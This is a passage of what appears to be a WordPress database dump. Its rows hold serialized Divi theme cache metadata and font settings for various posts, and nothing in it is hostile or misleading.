:0:{}}'),(32938,531,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32939,531,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32940,531,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32941,932,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32942,932,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32943,932,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32933,1574,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32934,1574,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32935,1574,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32936,1574,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32927,1115,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32928,987,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32929,987,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32930,987,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32931,987,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32932,1022,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32923,834,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32924,1115,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32925,1115,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32926,1115,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32920,834,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32921,834,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32922,834,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32916,666,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32917,666,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32918,666,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32919,666,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32911,1500,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32912,1290,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32913,1290,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32914,1290,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32915,1290,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32910,1500,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32908,1500,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32909,1500,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32904,614,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32905,614,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32906,614,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32907,614,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32900,1186,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32901,1186,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32902,1186,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32903,1186,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32898,1285,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32899,1285,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32894,608,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32895,608,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32896,1285,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32897,1285,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32890,1059,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32891,1059,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_